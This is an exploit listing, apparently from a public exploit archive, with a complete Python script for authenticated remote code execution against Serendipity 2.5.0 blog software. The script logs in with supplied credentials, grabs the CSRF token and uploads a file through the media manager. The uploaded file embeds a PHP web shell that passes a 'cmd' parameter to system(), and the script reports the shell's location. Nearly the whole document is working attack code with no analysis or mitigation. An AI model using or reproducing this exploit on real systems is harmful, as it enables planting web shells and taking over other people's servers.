Serendipity 2.5.0 - Remote Code Execution (RCE)

1. # Exploit Title: Serendipity 2.5.0 - Remote Code Execution (RCE)
2. # Discovered by: Ahmet Ümit BAYRAM
3. # Discovered Date: 26.04.2024
4. # Vendor Homepage: https://docs.s9y.org/
5. # Software Link:https://www.s9y.org/latest
6. # Tested Version: v2.5.0 (latest)
7. # Tested on: MacOS
8.  
9. import requests
10. import time
11. import random
12. import string
13. from bs4 import BeautifulSoup
14.  
15. def generate_filename(extension=".inc"):
16. return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +
17. extension
18.  
19. def get_csrf_token(response):
20. soup = BeautifulSoup(response.text, 'html.parser')
21. token = soup.find('input', {'name': 'serendipity[token]'})
22. return token['value'] if token else None
23.  
24. def login(base_url, username, password):
25. print("Logging in...")
26. time.sleep(2)
27. session = requests.Session()
28. login_page = session.get(f"{base_url}/serendipity_admin.php")
29. token = get_csrf_token(login_page)
30. data = {
31. "serendipity[action]": "admin",
32. "serendipity[user]": username,
33. "serendipity[pass]": password,
34. "submit": "Login",
35. "serendipity[token]": token
36. }
37. headers = {
38. "Content-Type": "application/x-www-form-urlencoded",
39. "Referer": f"{base_url}/serendipity_admin.php"
40. }
41. response = session.post(f"{base_url}/serendipity_admin.php", data=data,
42. headers=headers)
43. if "Add media" in response.text:
44. print("Login Successful!")
45. time.sleep(2)
46. return session
47. else:
48. print("Login Failed!")
49. return None
50.  
51. def upload_file(session, base_url, filename, token):
52. print("Shell Preparing...")
53. time.sleep(2)
54. boundary = "---------------------------395233558031804950903737832368"
55. headers = {
56. "Content-Type": f"multipart/form-data; boundary={boundary}",
57. "Referer": f"{base_url}
58. /serendipity_admin.php?serendipity[adminModule]=media"
59. }
60. payload = (
61. f"--{boundary}\r\n"
62. f"Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n"
63. f"{token}\r\n"
64. f"--{boundary}\r\n"
65. f"Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n"
66. f"admin\r\n"
67. f"--{boundary}\r\n"
68. f"Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n"
69. f"media\r\n"
70. f"--{boundary}\r\n"
71. f"Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n"
72. f"add\r\n"
73. f"--{boundary}\r\n"
74. f"Content-Disposition: form-data; name=\"serendipity[userfile][1]\";
75. filename=\"{filename}\"\r\n"
76. f"Content-Type: text/html\r\n\r\n"
77. "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo
78. basename($_SERVER['PHP_SELF']); ?>\">\n"
79. "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input
80. type=\"SUBMIT\" value=\"Execute\">\n"
81. "</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}
82. \n?>\n</pre>\n</body>\n</html>\r\n"
83. f"--{boundary}--\r\n"
84. )
85.  
86. response = session.post(f"{base_url}
87. /serendipity_admin.php?serendipity[adminModule]=media", headers=headers,
88. data=payload.encode('utf-8'))
89. if f"File {filename} successfully uploaded as" in response.text:
90. print(f"Your shell is ready: {base_url}/uploads/{filename}")
91. else:
92. print("Exploit Failed!")
93.  
94. def main(base_url, username, password):
95. filename = generate_filename()
96. session = login(base_url, username, password)
97. if session:
98. token = get_csrf_token(session.get(f"{base_url}
99. /serendipity_admin.php?serendipity[adminModule]=media"))
100. upload_file(session, base_url, filename, token)
101.  
102. if __name__ == "__main__":
103. import sys
104. if len(sys.argv) != 4:
105. print("Usage: python script.py <siteurl> <username> <password>")
106. else:
107. main(sys.argv[1], sys.argv[2], sys.argv[3])
108.